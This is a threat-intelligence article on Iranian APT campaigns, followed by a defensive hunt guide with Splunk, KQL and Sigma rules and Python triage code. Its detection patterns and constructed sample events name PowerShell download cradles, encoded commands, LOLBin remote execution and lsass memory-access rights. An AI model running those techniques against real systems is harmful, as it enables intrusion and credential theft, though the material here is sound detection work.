Iran's Cyber Operations Enter New Phase: What Security Teams Need to Know
Iranian state-sponsored cyber operations have reached a new level of sophistication and aggression. Iranian groups have moved from opportunistic attacks to targeted campaigns against specific sectors, conducted with surgical precision.
This shift represents a fundamental change in how Iran approaches cyber warfare. Gone are the days of opportunistic attacks and amateur-hour operations. Today's Iranian cyber units operate with military discipline, advanced persistent threat (APT) capabilities, and clear strategic objectives.
The New Iranian Cyber Doctrine
Iranian cyber operations now follow a three-pronged strategy that mirrors traditional military doctrine. First, reconnaissance and intelligence gathering through spear-phishing campaigns targeting high-value individuals. Second, establishing persistent access to critical systems through supply chain compromises and zero-day exploits. Third, preparing for potential destructive attacks while maintaining plausible deniability.
Iranian groups like APT35 (Charming Kitten), APT33 (Elfin), and APT34 (OilRig) have been observed sharing tools and techniques, though they continue to operate as distinct entities with separate targeting priorities. That sharing lets them pool resources, intelligence, and tradecraft across different campaigns.
Iranian groups have been documented using legitimate cloud services including Microsoft 365, Google Drive, Dropbox, and other platforms for hosting payloads and command and control operations. They're also employing living-off-the-land techniques, using PowerShell, WMI, and other built-in Windows tools to avoid detection. The sophistication level now rivals many advanced APT groups.
Target Selection Gets Strategic
Iranian cyber groups have become much more selective about their targets. Instead of casting wide nets, they're focusing on specific sectors that align with Iran's geopolitical objectives. Energy companies, particularly those involved in oil and gas infrastructure, remain primary targets. Defense contractors working on Middle East projects face constant probing attempts.
Telecommunications providers have emerged as a new priority target. Iranian groups understand that compromising telecom infrastructure provides access to communications metadata and the ability to intercept calls and messages. Recent attacks against telecom providers in the Gulf states demonstrate this shift in targeting priorities.
Financial institutions, particularly those with connections to sanctions enforcement, also face increased attention. Iranian groups are not just looking for financial gain. They're gathering intelligence on sanctions compliance systems and identifying potential pressure points for future operations.
Technical Capabilities Advance Rapidly
Iranian cyber units have made significant investments in custom malware development. Tools like HYPERSCRAPE and POWERLESS show sophisticated understanding of enterprise networks and security tools. These are not script kiddie tools. They're professionally developed implants designed for long-term persistence and data exfiltration.
The groups have also improved their operational security significantly. They're using compromised infrastructure in third countries to mask their origins, employing multiple layers of proxies and VPNs, and carefully timing their operations to avoid detection.
Mobile device targeting has become another area of focus. Iranian groups are developing Android and iOS malware specifically designed to compromise smartphones and tablets. They understand that mobile devices often have access to corporate networks through VPN connections and mobile device management systems.
Intelligence Sharing Creates Blind Spots
Proxies and cutouts make attribution even more difficult. Iranian intelligence services are recruiting cybercriminals from other countries to conduct attacks on their behalf. These hired guns provide plausible deniability while executing Iranian strategic objectives. The line between state-sponsored and criminal activity continues to blur.
Some Iranian groups are also selling access to compromised networks to other threat actors. This commercialization of state-sponsored cyber operations creates a secondary market for network access and stolen credentials.
Regional Tensions Drive Cyber Escalation
Middle East tensions directly correlate with Iranian cyber activity levels. Periods of heightened diplomatic tension consistently precede increases in cyber operations. The targeting often reflects current geopolitical disputes, with attacks focusing on countries taking positions contrary to Iranian interests.
Cyber operations serve as a pressure release valve for Iran, allowing them to respond to perceived provocations without risking direct military confrontation. This makes predicting Iranian cyber activity relatively straightforward for those monitoring regional tensions.
The integration of cyber operations with traditional intelligence gathering has also improved. Iranian cyber units now coordinate with human intelligence assets to identify high-value targets and validate stolen information.
What Security Teams Should Do
Defending against Iranian cyber operations requires a multi-layered approach that goes beyond traditional perimeter security. Organizations need to assume breach and focus on detection and response capabilities. Endpoint detection and response (EDR) tools configured to detect living-off-the-land techniques are essential.
Network segmentation becomes critical when facing APT-level threats. Iranian groups excel at lateral movement once they gain initial access. Proper network segmentation can contain breaches and prevent access to critical systems. Zero-trust network architecture provides the best defense against these sophisticated threats.
Employee security awareness training should focus on Iranian APT tactics including: long-term social engineering campaigns that build rapport over months, job-themed lures targeting aerospace and defense employees, and spoofed login pages for cloud services. Training should include examples of actual Iranian phishing emails documented by security vendors.
Threat hunting programs should specifically look for indicators of compromise associated with known Iranian malware families. Regular threat hunting exercises can identify dormant infections before they become active threats.
The Path Forward
Iranian cyber capabilities will continue advancing as long as the country faces international pressure and sanctions. Cyber operations provide an asymmetric response capability that's difficult to defend against and even harder to attribute definitively.
The evolution of Iranian techniques will likely influence other threat actors through the cybercriminal marketplace. What starts as state-sponsored innovation often becomes standard criminal practice within months.
Organizations in targeted sectors need to treat Iranian APT groups as a persistent, sophisticated threat that requires dedicated resources and specialized expertise to defend against. Half-measures will not work against these well-funded, professionally operated threat groups.
Red Sheep Assessment: Iran's cyber doctrine shift from opportunistic to strategic represents a maturation that makes them a tier-one threat actor. The integration of cyber operations with traditional intelligence collection creates a feedback loop that will accelerate their targeting accuracy and operational success. We assess that Iranian capabilities will likely continue to advance, potentially approaching the sophistication level of tier-one threat actors within the next 18 months.
---
Hunt Guide: Iranian APT Strategic Campaign Shift
Hypothesis: If Iranian APT groups (APT33/34/35) are active in our environment, we expect to observe PowerShell-based living-off-the-land techniques, cloud service abuse for C2, and targeted spear-phishing against energy/defense/telecom sectors in Windows Security, Sysmon, and cloud audit logs.
Intelligence Summary: Iranian state-sponsored groups including APT33 (Elfin), APT34 (OilRig), and APT35 (Charming Kitten) have evolved from opportunistic attacks to strategic campaigns with military-grade discipline. They now employ sophisticated custom malware (HYPERSCRAPE, POWERLESS), abuse legitimate cloud services for C2, and share tools/TTPs across groups while targeting energy, defense, telecom, and financial sectors aligned with Iranian geopolitical objectives.
Confidence: High | Priority: Critical
Scope
- Networks: All corporate networks with focus on: DMZ systems with internet exposure, VPN endpoints, email gateways, and systems with access to cloud storage services
- Timeframe: Initial sweep: Last 90 days for IOC hunting. Behavioral hunts: Last 30 days with daily execution. Long-term: Continuous monitoring with weekly analysis
- Priority Systems: Energy sector control systems, defense contractor development environments, telecom infrastructure management systems, financial systems handling sanctions data, executive and VIP endpoints, cloud service gateways
MITRE ATT&CK Techniques
T1059.001 — PowerShell (Execution) [P1]
Iranian APTs heavily leverage PowerShell for living-off-the-land techniques to avoid detection, execute payloads, and perform reconnaissance
Splunk SPL:
index=windows ((source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104) OR (source="WinEventLog:Security" EventCode=4688 CommandLine="*powershell*")) | eval cmd=coalesce(ScriptBlockText, CommandLine) | eval sus_encoding=if(match(cmd, "(?i)(-e[a-z]*\s+[A-Za-z0-9+/=]{20,}|-ep\s+bypass|-executionpolicy\s+bypass|-nop|-noni|-windowstyle\s+hidden|-w\s+h)"), 1, 0) | eval sus_download=if(match(cmd, "(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|net\.webclient)"), 1, 0) | eval sus_execution=if(match(cmd, "(?i)(invoke-expression|\biex\b|invoke-command|\bicm\b|start-process|\$env:)"), 1, 0) | where sus_encoding=1 OR sus_download=1 OR sus_execution=1 | stats count by Computer, User, cmd | sort -count
Elastic KQL:
((event.provider:"Microsoft-Windows-PowerShell" AND event.code:4104) OR (event.provider:"Microsoft-Windows-Security-Auditing" AND event.code:4688 AND process.command_line:*powershell*)) AND (process.command_line:(*encodedcommand* OR *bypass* OR *-nop* OR *hidden*) OR powershell.file.script_block_text:(*downloadstring* OR *downloadfile* OR *invoke-webrequest* OR *iwr* OR *wget* OR *webclient* OR *invoke-expression* OR *iex* OR *invoke-command*))
Sigma Rule:
title: Iranian APT PowerShell Living-off-the-Land Techniques
id: 8d7b3c3d-9e41-4f8b-8c0a-0e5d7e8b3a4f
status: stable
description: Detects PowerShell execution patterns consistent with Iranian APT groups
references:
  - Internal threat intelligence
author: Threat Hunt Team
date: 2024/01/15
modified: 2024/01/15
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection_powershell:
    - CommandLine|contains:
        - 'powershell'
        - 'pwsh'
    - Image|endswith:
        - '\powershell.exe'
        - '\pwsh.exe'
  selection_suspicious:
    CommandLine|contains:
      - '-encodedcommand'
      - '-ec'
      - '-e '
      - 'bypass'
      - '-nop'
      - '-noni'
      - '-windowstyle hidden'
      - '-w h'
      - 'downloadstring'
      - 'downloadfile'
      - 'invoke-webrequest'
      - 'iwr'
      - 'invoke-expression'
      - 'iex'
  condition: selection_powershell and selection_suspicious
falsepositives:
  - Legitimate administrative scripts
  - Software installation scripts
level: high
Focus on encoded commands and download cradles. Whitelist known admin scripts by hash. Monitor for parent process anomalies (e.g., Word/Excel spawning PowerShell).
T1566.001 — Spearphishing Attachment (Initial Access) [P1]
Iranian APTs conduct targeted spear-phishing campaigns with job-themed lures targeting aerospace/defense employees and long-term social engineering
Splunk SPL:
index=email OR index=o365 (subject="*job*" OR subject="*position*" OR subject="*career*" OR subject="*resume*" OR subject="*CV*") (attachment_name="*.doc*" OR attachment_name="*.xls*" OR attachment_name="*.pdf" OR attachment_name="*.zip") | eval suspicious_sender=if(match(sender_domain, "(?i)(gmail|yahoo|hotmail|outlook)\.com$") OR sender_domain!=recipient_domain, 1, 0) | eval defense_sector=if(match(recipient_email, "(?i)@(boeing|lockheed|raytheon|northrop|general-dynamics|bae)"), 1, 0) | where suspicious_sender=1 OR defense_sector=1 | stats count by sender_email, recipient_email, subject, attachment_name | sort -count
Elastic KQL:
(event.dataset:email OR event.dataset:o365) AND (email.subject:(*job* OR *position* OR *career* OR *resume* OR *CV*)) AND (email.attachments.file.name:(*.doc* OR *.xls* OR *.pdf OR *.zip)) AND (email.from.address:(*@gmail.com OR *@yahoo.com OR *@hotmail.com OR *@outlook.com) OR email.to.address:(*@boeing* OR *@lockheed* OR *@raytheon* OR *@northrop* OR *@general-dynamics* OR *@bae*))
Sigma Rule:
title: Iranian APT Spearphishing Detection
id: 7f8b9c8d-8e41-5f9b-9c1a-1e6d8e9b4a5f
status: stable
description: Detects spearphishing attempts with job-themed lures targeting defense sector
logsource:
  service: email
detection:
  selection_subject:
    Subject|contains:
      - 'job'
      - 'position'
      - 'career'
      - 'resume'
      - 'CV'
  selection_attachment:
    AttachmentName|endswith:
      - '.docx'
      - '.doc'
      - '.xlsx'
      - '.xls'
      - '.pdf'
      - '.zip'
  selection_suspicious:
    - SenderDomain|endswith:
        - 'gmail.com'
        - 'yahoo.com'
        - 'hotmail.com'
        - 'outlook.com'
    - RecipientDomain|contains:
        - 'boeing'
        - 'lockheed'
        - 'raytheon'
        - 'northrop'
        - 'general-dynamics'
        - 'bae'
  condition: selection_subject and selection_attachment and selection_suspicious
level: high
Cross-reference with sender reputation services. Alert on first-time senders to VIPs. Check for domain typosquatting variations.
T1102 — Web Service (Command and Control) [P2]
Iranian APTs abuse legitimate cloud services (Microsoft 365, Google Drive, Dropbox) for payload hosting and C2 operations
Splunk SPL:
index=proxy OR index=dns OR index=sysmon (dest_host="*.storage.googleapis.com" OR dest_host="*.1drv.com" OR dest_host="*.sharepoint.com" OR dest_host="*.dropbox.com" OR dest_host="*.box.com" OR dest_host="*.mega.nz") | eval process_suspicious=if(match(process_name, "(?i)(powershell|cmd|wscript|cscript|mshta|rundll32)"), 1, 0) | eval user_agent_suspicious=if(match(user_agent, "(?i)(python|curl|wget|powershell|windowspowershell)") OR user_agent="-" OR isnull(user_agent), 1, 0) | eval bytes_out_suspicious=if(bytes_out > 1048576, 1, 0) | where process_suspicious=1 OR user_agent_suspicious=1 OR bytes_out_suspicious=1 | stats sum(bytes_out) as total_bytes, count by src_ip, dest_host, process_name, user_agent | sort -total_bytes
Elastic KQL:
(destination.domain:(*.storage.googleapis.com OR *.1drv.com OR *.sharepoint.com OR *.dropbox.com OR *.box.com OR *.mega.nz)) AND (process.name:(powershell* OR cmd* OR wscript* OR cscript* OR mshta* OR rundll32*) OR user_agent.original:(python* OR curl* OR wget* OR *powershell* OR "-") OR source.bytes:>1048576)
Sigma Rule:
title: Iranian APT Cloud Service Abuse for C2
id: 9f9b8c9d-9e51-6f9b-9c2a-2e7d9e9b5a6f
status: stable
description: Detects abuse of legitimate cloud services for C2 by Iranian APTs
logsource:
  category: proxy
detection:
  selection_domains:
    cs-host|endswith:
      - '.storage.googleapis.com'
      - '.1drv.com'
      - '.sharepoint.com'
      - '.dropbox.com'
      - '.box.com'
      - '.mega.nz'
  selection_suspicious:
    - c-useragent|contains:
        - 'python'
        - 'curl'
        - 'wget'
        - 'powershell'
    - c-useragent: '-'
    - cs-bytes|gt: 1048576
  condition: selection_domains and selection_suspicious
falsepositives:
  - Legitimate file sharing
  - Backup software
level: medium
Baseline normal cloud storage usage per user. Alert on new cloud service destinations from servers. Monitor for binary/encrypted file uploads.
T1218.001 — Compiled HTML File (Defense Evasion) [P1]
Iranian APTs use mshta.exe and other LOLBins to execute malicious scripts while evading detection
Splunk SPL:
index=windows ((sourcetype="WinEventLog:Security" EventCode=4688) OR (sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1)) (Image="*\\mshta.exe" OR Image="*\\rundll32.exe" OR Image="*\\regsvr32.exe" OR Image="*\\wmic.exe" OR Image="*\\cscript.exe" OR Image="*\\wscript.exe") | eval remote_execution=if(match(CommandLine, "(?i)(http|https|ftp)://"), 1, 0) | eval suspicious_parent=if(match(ParentImage, "(?i)(winword|excel|powerpnt|outlook|chrome|firefox|iexplore)"), 1, 0) | eval obfuscated=if(match(CommandLine, "(?i)(javascript:|vbscript:|about:)"), 1, 0) | where remote_execution=1 OR suspicious_parent=1 OR obfuscated=1 | stats count by Computer, User, Image, CommandLine, ParentImage | sort -count
Elastic KQL:
(event.code:(1 OR 4688)) AND (process.executable:(*\\mshta.exe OR *\\rundll32.exe OR *\\regsvr32.exe OR *\\wmic.exe OR *\\cscript.exe OR *\\wscript.exe)) AND (process.command_line:(*http://* OR *https://* OR *ftp://*) OR process.parent.name:(winword* OR excel* OR powerpnt* OR outlook* OR chrome* OR firefox* OR iexplore*) OR process.command_line:(*javascript:* OR *vbscript:* OR *about:*))
Sigma Rule:
title: Iranian APT LOLBin Execution
id: af9b9c9d-ae61-7f9b-ac3a-3e8d9eab6a7f
status: stable
description: Detects LOLBin abuse patterns used by Iranian APTs
logsource:
  category: process_creation
  product: windows
detection:
  selection_process:
    Image|endswith:
      - '\mshta.exe'
      - '\rundll32.exe'
      - '\regsvr32.exe'
      - '\wmic.exe'
      - '\cscript.exe'
      - '\wscript.exe'
  selection_suspicious:
    - CommandLine|contains:
        - 'http://'
        - 'https://'
        - 'ftp://'
        - 'javascript:'
        - 'vbscript:'
        - 'about:'
    - ParentImage|endswith:
        - '\winword.exe'
        - '\excel.exe'
        - '\powerpnt.exe'
        - '\outlook.exe'
  condition: selection_process and selection_suspicious
level: high
Monitor for uncommon command line arguments. Track frequency of LOLBin usage per system. Alert on execution from user-writable directories.
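Added example, not code from the hunt guide: the PowerShell (T1059.001) and LOLBin heuristics above as one Python triage function over Sysmon Event ID 1 style records, so the two rule sets can be tested against sample telemetry before they go into the SIEM. The record field names follow Sysmon (Image, ParentImage, CommandLine); the sample events and the reason labels are constructed for this example.

```python
import re
from typing import Dict, List

# Script hosts and LOLBins from the two hunt sections above
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe",
           "cscript.exe", "wscript.exe"}
# Parents that should not normally spawn a script host
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                    "chrome.exe", "firefox.exe", "iexplore.exe"}

# -e/-ec/-enc/-EncodedCommand followed by a base64 blob, plus the quiet-window
# and policy-bypass switches; the lookbehind keeps "New-Object" from matching as "-Object"
PS_EVASION = re.compile(
    r"(?i)(?<![\w-])-(?:e[a-z]*\s+[A-Za-z0-9+/=]{20,}|nop(?:rofile)?\b|noni(?:nteractive)?\b|"
    r"ep\s+bypass|executionpolicy\s+bypass|w\s+h(?:idden)?\b|windowstyle\s+hidden)"
)
PS_CRADLE = re.compile(
    r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|"
    r"\bcurl\b|net\.webclient|invoke-expression|\biex\b)"
)
REMOTE_OR_SCRIPT_URI = re.compile(r"(?i)\b(?:https?|ftp)://|\b(?:javascript|vbscript|about):")


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event is suspicious; an empty list means no hit."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if image in POWERSHELL:
        if PS_EVASION.search(cmd):
            reasons.append("powershell-evasion-switch")
        if PS_CRADLE.search(cmd):
            reasons.append("powershell-download-cradle")
    if image in LOLBINS and REMOTE_OR_SCRIPT_URI.search(cmd):
        reasons.append("lolbin-remote-or-script-uri")
    if image in POWERSHELL | LOLBINS and parent in DOCUMENT_PARENTS:
        reasons.append("document-or-browser-parent")
    return reasons


# Constructed sample events (not real telemetry); the base64 blob is a placeholder
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -NoP -W Hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://cdn.example.invalid/update.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
]


def run_hunt(events=SAMPLE_EVENTS) -> Dict[str, List[str]]:
    """Map each flagged command line to its reasons; benign events are omitted."""
    return {e["CommandLine"]: r for e in events if (r := triage(e))}
```

The third sample (a signed-script invocation with no evasion switch) is the kind of admin activity the note above says to allowlist by hash; the triage leaves it unflagged without any allowlist.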
T1055 — Process Injection (Defense Evasion) [P1]
HYPERSCRAPE and POWERLESS malware use process injection for persistence and defense evasion
Splunk SPL:
index=sysmon (EventCode=8 OR EventCode=10 OR EventCode=7) | eval injection_target=case(EventCode=8, TargetImage, EventCode=10, TargetImage, EventCode=7, ImageLoaded) | eval injection_source=coalesce(SourceImage, Image) | eval suspicious_source=if(match(injection_source, "(?i)(powershell|cmd|wscript|cscript|mshta|rundll32)"), 1, 0) | eval suspicious_target=if(match(injection_target, "(?i)(explorer|svchost|lsass|services|winlogon|csrss|chrome|firefox|outlook)"), 1, 0) | eval remote_thread=if(EventCode=8 AND StartFunction!="-", 1, 0) | where (suspicious_source=1 AND suspicious_target=1) OR remote_thread=1 | stats count by Computer, injection_source, injection_target, EventCode | sort -count
Elastic KQL:
(event.provider:"Microsoft-Windows-Sysmon" AND event.code:(7 OR 8 OR 10)) AND ((process.name:(powershell* OR cmd* OR wscript* OR cscript* OR mshta* OR rundll32*) AND (winlog.event_data.TargetImage:(*\\explorer.exe OR *\\svchost.exe OR *\\lsass.exe OR *\\services.exe OR *\\winlogon.exe OR *\\csrss.exe OR *\\chrome.exe OR *\\firefox.exe OR *\\outlook.exe) OR winlog.event_data.ImageLoaded:(*\\explorer.exe OR *\\svchost.exe OR *\\lsass.exe OR *\\services.exe OR *\\winlogon.exe OR *\\csrss.exe))) OR (event.code:8 AND winlog.event_data.StartFunction:*))
Sigma Rule:
title: Iranian APT Process Injection Activity
id: bf9b9d9d-ae71-8f9b-ad3a-4e8d9eac7a8f
status: stable
description: Detects process injection patterns used by HYPERSCRAPE/POWERLESS malware
logsource:
  product: windows
  service: sysmon
detection:
  selection_createthread:
    EventID: 8
    SourceImage|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\wscript.exe'
      - '\cscript.exe'
      - '\mshta.exe'
      - '\rundll32.exe'
    TargetImage|endswith:
      - '\explorer.exe'
      - '\svchost.exe'
      - '\lsass.exe'
      - '\services.exe'
      - '\winlogon.exe'
      - '\csrss.exe'
  selection_processaccess:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF'
      - '0x1F1FFF'
      - '0x1F3FFF'
      - '0x1FFFFF'
  condition: selection_createthread or selection_processaccess
falsepositives:
  - Security software
  - System management tools
level: high
Focus on PROCESS_ALL_ACCESS permissions. Cross-reference with network connections from injected processes. Monitor for process hollowing indicators.
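Added example, not part of the guide: instead of string-matching four GrantedAccess literals, decode the Sysmon Event ID 10 mask bit by bit against the documented Windows process access rights, so any right combination that permits writing into and executing in another process is caught, including masks the Sigma rule's list would miss. The sample records and the reason labels are constructed for this example.

```python
from typing import Dict, List

# Process access rights from winnt.h (documented Windows constants)
PROCESS_RIGHTS = {
    0x000001: "PROCESS_TERMINATE",
    0x000002: "PROCESS_CREATE_THREAD",
    0x000008: "PROCESS_VM_OPERATION",
    0x000010: "PROCESS_VM_READ",
    0x000020: "PROCESS_VM_WRITE",
    0x000040: "PROCESS_DUP_HANDLE",
    0x000080: "PROCESS_CREATE_PROCESS",
    0x000200: "PROCESS_SET_INFORMATION",
    0x000400: "PROCESS_QUERY_INFORMATION",
    0x000800: "PROCESS_SUSPEND_RESUME",
    0x001000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x100000: "SYNCHRONIZE",
}
# PROCESS_ALL_ACCESS is 0x1F0FFF on XP/2003 and 0x1FFFFF from Vista on; testing for the
# 0x1F0FFF bits catches both, plus the 0x1F1FFF / 0x1F3FFF values the Sigma rule lists.
ALL_ACCESS_CORE = 0x1F0FFF
# Smallest set of rights that lets a caller place code in another process and run it
INJECT_MASK = 0x000002 | 0x000008 | 0x000020   # CREATE_THREAD | VM_OPERATION | VM_WRITE
# Enough to read another process's memory
MEMORY_READ_MASK = 0x000010 | 0x000400        # VM_READ | QUERY_INFORMATION


def parse_access(value: str) -> int:
    """Sysmon logs GrantedAccess as a hex string such as '0x1FFFFF'."""
    return int(value, 16)


def decode_rights(mask: int) -> List[str]:
    """Names of the documented rights set in the mask, lowest bit first."""
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def classify_process_access(event: Dict[str, str]) -> List[str]:
    """Reasons a Sysmon Event ID 10 record deserves a look; empty means routine."""
    mask = parse_access(event["GrantedAccess"])
    target = event.get("TargetImage", "").rsplit("\\", 1)[-1].lower()
    reasons: List[str] = []
    if (mask & ALL_ACCESS_CORE) == ALL_ACCESS_CORE:
        reasons.append("process-all-access")
    if (mask & INJECT_MASK) == INJECT_MASK:
        reasons.append("write-and-execute-rights")
    if target == "lsass.exe" and (mask & MEMORY_READ_MASK) == MEMORY_READ_MASK:
        reasons.append("lsass-memory-read")
    return reasons


# Constructed Sysmon Event ID 10 records (not real telemetry)
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Users\bob\AppData\Local\Temp\svc.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Program Files\Mozilla Firefox\firefox.exe", "GrantedAccess": "0x3A"},
]


def hunt(events=SAMPLE_EVENTS):
    """(source, target, reasons) for every record that is not routine."""
    return [(e["SourceImage"].rsplit("\\", 1)[-1], e["TargetImage"].rsplit("\\", 1)[-1], r)
            for e in events if (r := classify_process_access(e))]
```

The fourth sample (0x3A) is exactly the case the literal list misses: no PROCESS_ALL_ACCESS, but every right needed for injection.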
T1071.001 — Web Protocols (Command and Control) [P2]
Iranian APTs use compromised infrastructure in third countries with multiple proxy layers for C2 communications
Splunk SPL:
index=proxy OR index=firewall | eval suspicious_port=if(dest_port IN (8080, 8443, 8888, 9090, 3128, 1080), 1, 0) | eval rare_domain=if(match(dest_host, "\.(tk|ml|ga|cf|click|download|online)$"), 1, 0) | eval suspicious_country=if(dest_country IN ("Iran", "Russia", "China", "North Korea", "Romania", "Bulgaria"), 1, 0) | eval long_session=if(duration > 3600, 1, 0) | eval high_volume=if(bytes_out > 10485760, 1, 0) | where suspicious_port=1 OR rare_domain=1 OR suspicious_country=1 OR (long_session=1 AND high_volume=1) | stats sum(bytes_out) as total_bytes, count by src_ip, dest_host, dest_country, dest_port | sort -total_bytes
Elastic KQL:
(event.category:network) AND (destination.port:(8080 OR 8443 OR 8888 OR 9090 OR 3128 OR 1080) OR destination.domain:(*.tk OR *.ml OR *.ga OR *.cf OR *.click OR *.download OR *.online) OR destination.geo.country_name:("Iran" OR "Russia" OR "China" OR "North Korea" OR "Romania" OR "Bulgaria") OR (event.duration:>3600000000000 AND source.bytes:>10485760))
Sigma Rule:
title: Iranian APT C2 Communication Patterns
id: cf9b9e9d-be81-9f9b-bd4a-5e9d9ead8a9f
status: stable
description: Detects C2 communication patterns used by Iranian APT groups
logsource:
  category: proxy
detection:
  selection_suspicious_ports:
    dst_port:
      - 8080
      - 8443
      - 8888
      - 9090
      - 3128
      - 1080
  selection_suspicious_domains:
    cs-host|endswith:
      - '.tk'
      - '.ml'
      - '.ga'
      - '.cf'
      - '.click'
      - '.download'
      - '.online'
  selection_suspicious_countries:
    dst_country:
      - 'IR'
      - 'RU'
      - 'CN'
      - 'KP'
      - 'RO'
      - 'BG'
  selection_long_session:
    duration|gt: 3600
    cs-bytes|gt: 10485760
  condition: selection_suspicious_ports or selection_suspicious_domains or selection_suspicious_countries or selection_long_session
falsepositives:
  - Legitimate proxy usage
  - VPN connections
level: medium
Baseline proxy usage patterns. Alert on new international destinations. Monitor for consistent beacon intervals suggesting automated C2.
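Added example for the beacon-interval check mentioned above (not code from the guide): parse a constructed proxy log excerpt and flag source/destination pairs whose gaps between connections stay nearly constant, which is what a timer-driven implant looks like even with a little jitter. The log format, hosts, byte counts and thresholds are assumptions made for this example.

```python
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed proxy log excerpt (not real traffic): "<timestamp> <src_ip> <dest_host> <bytes_out>"
SAMPLE_PROXY_LOG = """\
2024-01-15T10:00:00 10.0.0.5 cdn-sync.example.invalid 412
2024-01-15T10:00:05 10.0.0.9 files.example.invalid 20480
2024-01-15T10:00:10 10.0.0.9 files.example.invalid 8192
2024-01-15T10:01:00 10.0.0.5 cdn-sync.example.invalid 410
2024-01-15T10:02:01 10.0.0.5 cdn-sync.example.invalid 415
2024-01-15T10:02:30 10.0.0.9 files.example.invalid 512
2024-01-15T10:03:00 10.0.0.5 cdn-sync.example.invalid 409
2024-01-15T10:03:03 10.0.0.9 files.example.invalid 300000
2024-01-15T10:04:00 10.0.0.5 cdn-sync.example.invalid 412
2024-01-15T10:05:02 10.0.0.5 cdn-sync.example.invalid 411
2024-01-15T10:06:00 10.0.0.5 cdn-sync.example.invalid 413
2024-01-15T10:07:00 10.0.0.5 cdn-sync.example.invalid 410
2024-01-15T10:18:03 10.0.0.9 files.example.invalid 1024
2024-01-15T10:18:15 10.0.0.9 files.example.invalid 4096
"""

Record = Tuple[datetime, str, str, int]


def parse_proxy_log(text: str) -> List[Record]:
    rows: List[Record] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, nbytes = line.split()
        rows.append((datetime.fromisoformat(ts), src, dst, int(nbytes)))
    return rows


def find_beacons(rows: List[Record], min_events: int = 6, max_cv: float = 0.1) -> Dict[Tuple[str, str], dict]:
    """Flag (src, dst) pairs whose inter-connection gaps are nearly constant.

    cv = stdev / mean of the gaps: a timer-driven beacon scores near 0 even with
    some jitter, while interactive use is bursty and scores well above max_cv.
    """
    by_pair: Dict[Tuple[str, str], List[Tuple[datetime, int]]] = defaultdict(list)
    for ts, src, dst, nbytes in rows:
        by_pair[(src, dst)].append((ts, nbytes))
    hits: Dict[Tuple[str, str], dict] = {}
    for pair, recs in by_pair.items():
        if len(recs) < min_events:          # too few samples to call it periodic
            continue
        recs.sort()
        times = [t for t, _ in recs]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            hits[pair] = {"interval_s": round(mean, 1), "cv": round(cv, 3),
                          "events": len(recs), "bytes_out": sum(b for _, b in recs)}
    return hits
```

Pair the result with the per-user baseline the note recommends: a 60-second cadence to a destination no one else in the estate talks to is a much stronger signal than the same cadence to a corporate update server.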
T1027 — Obfuscated Files or Information (Defense Evasion) [P2]
Iranian APT malware uses sophisticated obfuscation including encrypted payloads and multi-layer encoding
Splunk SPL:
(index=av OR index=edr OR (index=sysmon EventCode=11)) | eval high_entropy=if(file_entropy > 7.5, 1, 0) | eval suspicious_extension=if(match(file_name, "(?i)\.(tmp|dat|bin|db)$"), 1, 0) | eval suspicious_location=if(match(file_path, "(?i)\\\\(temp|appdata|programdata)\\\\"), 1, 0) | eval double_extension=if(match(file_name, "(?i)\.(jpg|png|pdf|doc|xls)\.(exe|scr|bat|cmd|ps1)$"), 1, 0) | where high_entropy=1 OR (suspicious_extension=1 AND suspicious_location=1) OR double_extension=1 | stats count by Computer, file_path, file_name, file_hash | sort -count
Elastic KQL:
(event.code:11 OR event.category:malware) AND (file.entropy:>7.5 OR (file.extension:(tmp OR dat OR bin OR db) AND file.path:(*\\Temp\\* OR *\\AppData\\* OR *\\ProgramData\\*)) OR file.name:(*.jpg.exe OR *.png.exe OR *.pdf.exe OR *.doc.exe OR *.xls.exe OR *.jpg.scr OR *.png.scr OR *.pdf.scr))
Sigma Rule:
title: Iranian APT File Obfuscation Detection
id: df9b9f9d-be91-af9b-cd5a-6e9d9ead9a9f
status: stable
